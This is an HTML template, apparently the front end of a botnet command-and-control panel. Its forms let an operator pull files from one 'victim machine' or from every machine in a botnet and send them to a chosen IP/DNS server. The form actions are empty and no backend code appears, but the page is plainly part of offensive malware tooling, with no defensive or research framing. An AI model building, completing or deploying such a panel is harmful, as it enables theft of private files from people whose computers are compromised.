<app-menu></app-menu>
<h2>GET FILES FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to get a file from Victim Machine:</p>
  <p>Set route where the file is (C:/temp/foto.png)<input type="text" /></p>
  <p>Set a different name to put the file in the server, with extension (ex:foto.png)<input type="text" /></p>
  <p>IP/DNS Server <input type="text" /></p>
  <p>Type of file. '1' for Binary, '0' for Plain Text <input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET FILES FROM ALL VICTIM MACHINES - BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to get a file from Victim Machines:</p>
  <p>Set route where the file is (C:/temp/foto.png)<input type="text" /></p>
  <p>Set a different name to put the file in the server, with extension (ex:foto.png)<input type="text" /></p>
  <p>IP/DNS Server <input type="text" /></p>
  <p>Type of file. '1' for Binary, '0' for Plain Text <input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
